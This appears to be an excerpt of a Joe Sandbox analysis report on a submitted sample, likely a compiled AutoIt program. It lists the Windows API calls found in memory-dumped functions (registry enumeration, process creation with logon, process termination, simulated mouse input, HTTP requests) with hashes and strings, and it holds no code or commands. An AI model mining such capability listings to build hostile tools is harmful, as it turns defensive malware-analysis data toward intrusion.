                                                • EncodePointer.KERNEL32(00000000), ref: 0079420A
                                                • DecodePointer.KERNEL32(007940F8), ref: 00794225
                                                 Memory Dump Source
                                                 • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                • String ID: RoUninitialize$combase.dll
                                                • API String ID: 3489934621-2819208100
                                                • Opcode ID: f0acf60d6ef72d4bccec10332ed04ff748a4738558a7e25e25a9a31a90986c30
                                                • Instruction ID: 64dbe1be88dc589273c117cd727aa389ae95ed4453632db55182f5de9b907be4
                                                • Opcode Fuzzy Hash: f0acf60d6ef72d4bccec10332ed04ff748a4738558a7e25e25a9a31a90986c30
                                                • Instruction Fuzzy Hash: B8E0B670591304EBEB509B61EC0DF183BA4FF44742F108826F511E11A0CFBE4640EA18
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: _memmove$__itow__swprintf
                                                • String ID:
                                                • API String ID: 3253778849-0
                                                • Opcode ID: d2a12bc66f749c31692a404fc01bba4f418ec87d707eb17e0e276557f727c1c8
                                                • Instruction ID: 9c32ed009238f5615b7dd88e9ac99ca34d3cb0e8b060f3dc7869593ae6906558
                                                • Opcode Fuzzy Hash: d2a12bc66f749c31692a404fc01bba4f418ec87d707eb17e0e276557f727c1c8
                                                • Instruction Fuzzy Hash: 2E61AD3050065ADBDF11EF20C88AEFE37B9AF44358F04851AF9595B292EB38E911CB90
                                                APIs
                                                  • Part of subcall function 00777F41: _memmove.LIBCMT ref: 00777F82
                                                  • Part of subcall function 007F0EA5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,007EFE38,?,?), ref: 007F0EBC
                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007F0348
                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 007F0388
                                                • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 007F03AB
                                                • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 007F03D4
                                                • RegCloseKey.ADVAPI32(?,?,00000000), ref: 007F0417
                                                • RegCloseKey.ADVAPI32(00000000), ref: 007F0424
                                                APIs
                                                • GetMenu.USER32(?), ref: 007F5864
                                                • GetMenuItemCount.USER32(00000000), ref: 007F589B
                                                • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 007F58C3
                                                • GetMenuItemID.USER32(?,?), ref: 007F5932
                                                • GetSubMenu.USER32(?,?), ref: 007F5940
                                                • PostMessageW.USER32(?,00000111,?,00000000), ref: 007F5991
                                                APIs
                                                • VariantInit.OLEAUT32(?), ref: 007CF218
                                                • VariantClear.OLEAUT32(00000013), ref: 007CF28A
                                                • VariantClear.OLEAUT32(00000000), ref: 007CF2E5
                                                • _memmove.LIBCMT ref: 007CF30F
                                                • VariantClear.OLEAUT32(?), ref: 007CF35C
                                                • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 007CF38A
                                                APIs
                                                • _memset.LIBCMT ref: 007D2550
                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007D259B
                                                • IsMenu.USER32(00000000), ref: 007D25BB
                                                • CreatePopupMenu.USER32 ref: 007D25EF
                                                • GetMenuItemCount.USER32(000000FF), ref: 007D264D
                                                • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 007D267E
                                                APIs
                                                  • Part of subcall function 00772612: GetWindowLongW.USER32(?,000000EB), ref: 00772623
                                                • BeginPaint.USER32(?,?,?,?,?,?), ref: 0077179A
                                                • GetWindowRect.USER32(?,?), ref: 007717FE
                                                • ScreenToClient.USER32(?,?), ref: 0077181B
                                                • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0077182C
                                                • EndPaint.USER32(?,?), ref: 00771876
                                                APIs
                                                • ShowWindow.USER32(008357B0,00000000,01204888,?,?,008357B0,?,007FB5DC,?,?), ref: 007FB746
                                                • EnableWindow.USER32(?,00000000), ref: 007FB76A
                                                • ShowWindow.USER32(008357B0,00000000,01204888,?,?,008357B0,?,007FB5DC,?,?), ref: 007FB7CA
                                                • ShowWindow.USER32(?,00000004,?,007FB5DC,?,?), ref: 007FB7DC
                                                • EnableWindow.USER32(?,00000001), ref: 007FB800
                                                • SendMessageW.USER32(?,0000130C,?,00000000), ref: 007FB823
                                                APIs
                                                • GetForegroundWindow.USER32(?,?,?,?,?,?,007E4F57,?,?,00000000,00000001), ref: 007E71C1
                                                  • Part of subcall function 007E3AB6: GetWindowRect.USER32(?,?), ref: 007E3AC9
                                                • GetDesktopWindow.USER32 ref: 007E71EB
                                                • GetWindowRect.USER32(00000000), ref: 007E71F2
                                                • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 007E7224
                                                  • Part of subcall function 007D52EB: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 007D5363
                                                • GetCursorPos.USER32(?), ref: 007E7250
                                                • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 007E72AE
                                                APIs
                                                  • Part of subcall function 007C83D1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 007C83E8
                                                  • Part of subcall function 007C83D1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 007C83F2
                                                  • Part of subcall function 007C83D1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 007C8401
                                                  • Part of subcall function 007C83D1: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 007C8408
                                                  • Part of subcall function 007C83D1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 007C841E
                                                • GetLengthSid.ADVAPI32(?,00000000,007C8757), ref: 007C8B8C
                                                • GetProcessHeap.KERNEL32(00000008,00000000), ref: 007C8B98
                                                • HeapAlloc.KERNEL32(00000000), ref: 007C8B9F
                                                • CopySid.ADVAPI32(00000000,00000000,?), ref: 007C8BB8
                                                • GetProcessHeap.KERNEL32(00000000,00000000,007C8757), ref: 007C8BCC
                                                • HeapFree.KERNEL32(00000000), ref: 007C8BD3
                                                APIs
                                                • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 007C890A
                                                • OpenProcessToken.ADVAPI32(00000000), ref: 007C8911
                                                • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 007C8920
                                                • CloseHandle.KERNEL32(00000004), ref: 007C892B
                                                • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 007C895A
                                                • DestroyEnvironmentBlock.USERENV(00000000), ref: 007C896E
                                                APIs
                                                • GetDC.USER32(00000000), ref: 007CBA77
                                                • GetDeviceCaps.GDI32(00000000,00000058), ref: 007CBA88
                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 007CBA8F
                                                • ReleaseDC.USER32(00000000,00000000), ref: 007CBA97
                                                • MulDiv.KERNEL32(000009EC,?,00000000), ref: 007CBAAE
                                                • MulDiv.KERNEL32(000009EC,?,?), ref: 007CBAC0
                                                APIs
                                                • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00790313
                                                • MapVirtualKeyW.USER32(00000010,00000000), ref: 0079031B
                                                • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00790326
                                                • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00790331
                                                • MapVirtualKeyW.USER32(00000011,00000000), ref: 00790339
                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00790341
                                                APIs
                                                • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 007D54A0
                                                • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 007D54B6
                                                • GetWindowThreadProcessId.USER32(?,?), ref: 007D54C5
                                                • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 007D54D4
                                                • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 007D54DE
                                                • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 007D54E5
                                                APIs
                                                • InterlockedExchange.KERNEL32(?,?), ref: 007D72EC
                                                • EnterCriticalSection.KERNEL32(?,?,00781044,?,?), ref: 007D72FD
                                                • TerminateThread.KERNEL32(00000000,000001F6,?,00781044,?,?), ref: 007D730A
                                                • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00781044,?,?), ref: 007D7317
                                                  • Part of subcall function 007D6CDE: CloseHandle.KERNEL32(00000000,?,007D7324,?,00781044,?,?), ref: 007D6CE8
                                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 007D732A
                                                • LeaveCriticalSection.KERNEL32(?,?,00781044,?,?), ref: 007D7331
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                • String ID:
                                                • API String ID: 3495660284-0
                                                • Opcode ID: 360819c2a2686113f96c5dfd83a356be03ad1341ebeb1b8499e4bb2d76c5367d
                                                • Instruction ID: 9002012c669ef1bae064f522cfb245444570e7085dea4f3deb264d26de64d584
                                                • Opcode Fuzzy Hash: 360819c2a2686113f96c5dfd83a356be03ad1341ebeb1b8499e4bb2d76c5367d
                                                • Instruction Fuzzy Hash: 70F08237140612EBE7111B64ED8C9EF773AFF49302B004532F602911A0DF7D5811CBA4
                                                APIs
                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 007C8C5F
                                                • UnloadUserProfile.USERENV(?,?), ref: 007C8C6B
                                                • CloseHandle.KERNEL32(?), ref: 007C8C74
                                                • CloseHandle.KERNEL32(?), ref: 007C8C7C
                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 007C8C85
                                                • HeapFree.KERNEL32(00000000), ref: 007C8C8C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                • String ID:
                                                • API String ID: 146765662-0
                                                • Opcode ID: df428b0ec7bbde894decd8bf4c80888691f5dd29303daf87bdacd909d3858fe4
                                                • Instruction ID: f0cff4565bbef61f72a5d1e9b0f846c356b8203bc9a8ef5770bab2d3ee3bd095
                                                • Opcode Fuzzy Hash: df428b0ec7bbde894decd8bf4c80888691f5dd29303daf87bdacd909d3858fe4
                                                • Instruction Fuzzy Hash: 44E05277104506FBDA012FE6EC0C96ABF69FF89762B548631F21981470CF3A9861DB68
                                                APIs
                                                • VariantInit.OLEAUT32(?), ref: 007E8728
                                                • CharUpperBuffW.USER32(?,?), ref: 007E8837
                                                • VariantClear.OLEAUT32(?), ref: 007E89AF
                                                  • Part of subcall function 007D760B: VariantInit.OLEAUT32(00000000), ref: 007D764B
                                                  • Part of subcall function 007D760B: VariantCopy.OLEAUT32(00000000,?), ref: 007D7654
                                                  • Part of subcall function 007D760B: VariantClear.OLEAUT32(00000000), ref: 007D7660
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                • API String ID: 4237274167-1221869570
                                                • Opcode ID: 184bce5c86fb132f93d252aa29e81771bb2dca9be378390472a025962e97ff25
                                                • Instruction ID: 11ebe9dda711efa5cb008f4f1137e8443128e05de6d29e34c4f594dd483cf914
                                                • Opcode Fuzzy Hash: 184bce5c86fb132f93d252aa29e81771bb2dca9be378390472a025962e97ff25
                                                • Instruction Fuzzy Hash: BA91CC35608341DFCB00DF25C48496ABBF4EF89354F14896EF99A8B362DB38E905CB52
                                                APIs
                                                  • Part of subcall function 0078FE06: _wcscpy.LIBCMT ref: 0078FE29
                                                • _memset.LIBCMT ref: 007D2E7F
                                                • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 007D2EAE
                                                • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 007D2F61
                                                • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 007D2F8F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                • String ID: 0
                                                • API String ID: 4152858687-4108050209
                                                • Opcode ID: 00ef143a557b1fede358613f40a10c3a2e78cb7b00b1c029f89074743beced33
                                                • Instruction ID: 3a13b82742f50e7b2889ff2d2f96ed9fd126b88697f12994f5aaf59446849c64
                                                • Opcode Fuzzy Hash: 00ef143a557b1fede358613f40a10c3a2e78cb7b00b1c029f89074743beced33
                                                • Instruction Fuzzy Hash: 3751B1716083019ED7259F28D84866BBBF4EFA5310F144A2EF894D32A2DB68C9078792
                                                APIs
                                                • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 007CD8E3
                                                • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 007CD919
                                                • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 007CD92A
                                                • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 007CD9AC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: ErrorMode$AddressCreateInstanceProc
                                                • String ID: DllGetClassObject
                                                • API String ID: 753597075-1075368562
                                                • Opcode ID: b15d854941070ff317117f168a5be85707c37f0e257d8b0bd4c08fbddd76ed3b
                                                • Instruction ID: 9110a67d5247b7a4bc4825cd00871df8697073c658bbd81ddf8849fd0319d32f
                                                • Opcode Fuzzy Hash: b15d854941070ff317117f168a5be85707c37f0e257d8b0bd4c08fbddd76ed3b
                                                • Instruction Fuzzy Hash: 3F418D75600204EFDB24CF55C884FAA7BA9EF4A314B1180BDED099F245D7B9ED44CBA0
                                                APIs
                                                • _memset.LIBCMT ref: 007D2AB8
                                                • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 007D2AD4
                                                • DeleteMenu.USER32(?,00000007,00000000), ref: 007D2B1A
                                                • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00835890,00000000), ref: 007D2B63
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Menu$Delete$InfoItem_memset
                                                • String ID: 0
                                                • API String ID: 1173514356-4108050209
                                                • Opcode ID: 1d320fd3648b7e7bdd6f34e9fcce9926f0d4cf29fac8581e0d91118aa1e5519a
                                                • Instruction ID: 5aaf6e0ea2fdacc2287459e197294764496bae020fe8400fd264148d8c276120
                                                • Opcode Fuzzy Hash: 1d320fd3648b7e7bdd6f34e9fcce9926f0d4cf29fac8581e0d91118aa1e5519a
                                                • Instruction Fuzzy Hash: D34180702043019FD720DF24C885B2ABBA9AF95320F10455FF96597392DBB8E907CB62
                                                APIs
                                                • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 007ED8D9
                                                  • Part of subcall function 007779AB: _memmove.LIBCMT ref: 007779F9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: BuffCharLower_memmove
                                                • String ID: cdecl$none$stdcall$winapi
                                                • API String ID: 3425801089-567219261
                                                • Opcode ID: 0d02049e050447065a5acfe97afa0f341fcb3f7e0f93af7eadc71e730421831c
                                                • Instruction ID: 70f46d1462ed048fbb99077d7dbb91975f9bc9a502f6a1d05e023d515cf9a124
                                                • Opcode Fuzzy Hash: 0d02049e050447065a5acfe97afa0f341fcb3f7e0f93af7eadc71e730421831c
                                                • Instruction Fuzzy Hash: BE31D070900619EFCF14EF55CC949EEB3B4FF09320B10862AE8659B2D2CB79AD05CB90
                                                APIs
                                                  • Part of subcall function 00777F41: _memmove.LIBCMT ref: 00777F82
                                                  • Part of subcall function 007CAEA4: GetClassNameW.USER32(?,?,000000FF), ref: 007CAEC7
                                                • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 007C91D6
                                                • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 007C91E9
                                                • SendMessageW.USER32(?,00000189,?,00000000), ref: 007C9219
                                                  • Part of subcall function 00777D2C: _memmove.LIBCMT ref: 00777D66
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: MessageSend$_memmove$ClassName
                                                • String ID: ComboBox$ListBox
                                                • API String ID: 365058703-1403004172
                                                • Opcode ID: b448daf6c32d89eeeee3cb7dee407080f34da9e3ebe9e708ac61d0bf8f64a49a
                                                • Instruction ID: d3ecfa6988bf46e6f4a0beb30262c6cada2890e37d7eddb356e33c837454378d
                                                • Opcode Fuzzy Hash: b448daf6c32d89eeeee3cb7dee407080f34da9e3ebe9e708ac61d0bf8f64a49a
                                                • Instruction Fuzzy Hash: 0D21D071A00108BFDB18AB64DC8EDFEBB69EF45360B14822DF965972E0DB3D4D0AD610
                                                APIs
                                                • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 007E1962
                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007E1988
                                                • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 007E19B8
                                                • InternetCloseHandle.WININET(00000000), ref: 007E19FF
                                                  • Part of subcall function 007E2599: GetLastError.KERNEL32(?,?,007E192D,00000000,00000000,00000001), ref: 007E25AE
                                                  • Part of subcall function 007E2599: SetEvent.KERNEL32(?,?,007E192D,00000000,00000000,00000001), ref: 007E25C3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                • String ID:
                                                • API String ID: 3113390036-3916222277
                                                • Opcode ID: 046becd660ba120bfdd191a233fd3bf86796912fdfa1ced838a7b3ddbcb33df6
                                                • Instruction ID: 9af25a53ca111a149ced476732989f3967ed838ee6bce17b350f925fa3e9567b
                                                • Opcode Fuzzy Hash: 046becd660ba120bfdd191a233fd3bf86796912fdfa1ced838a7b3ddbcb33df6
                                                • Instruction Fuzzy Hash: E621D0B1101288BFEB219F61DC96EBF77ECEB4C744F50812AF405D2241EA38AE059771
                                                APIs
                                                  • Part of subcall function 00771D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00771D73
                                                  • Part of subcall function 00771D35: GetStockObject.GDI32(00000011), ref: 00771D87
                                                  • Part of subcall function 00771D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00771D91
                                                • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 007F6493
                                                • LoadLibraryW.KERNEL32(?), ref: 007F649A
                                                • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 007F64AF
                                                • DestroyWindow.USER32(?), ref: 007F64B7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                • String ID: SysAnimate32
                                                • API String ID: 4146253029-1011021900
                                                • Opcode ID: 9deffba6597c7d98b5a54b831486516853ec6fc03ee243b5b0b5175adec5e885
                                                • Instruction ID: b481b9075fa57d2927a190a9f779a33b0df0b05e7484c30ea99b7dfa7877b03b
                                                • Opcode Fuzzy Hash: 9deffba6597c7d98b5a54b831486516853ec6fc03ee243b5b0b5175adec5e885
                                                • Instruction Fuzzy Hash: 78219D71600249EBEF106EA4DC80EBB37A9EF49364F108629FB54D3290CB39CD51A760
                                                APIs
                                                • GetStdHandle.KERNEL32(0000000C), ref: 007D6E65
                                                • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 007D6E98
                                                • GetStdHandle.KERNEL32(0000000C), ref: 007D6EAA
                                                • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 007D6EE4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: CreateHandle$FilePipe
                                                • String ID: nul
                                                • API String ID: 4209266947-2873401336
                                                • Opcode ID: 5de82b37448d9d8582443a4a29d003a923f6919f3911c5b0e86e21b792ace4d5
                                                • Instruction ID: 37eb4c4e348cd66071b49e1a787e9b0bee800830f762c563c98f20b595147229
                                                • Opcode Fuzzy Hash: 5de82b37448d9d8582443a4a29d003a923f6919f3911c5b0e86e21b792ace4d5
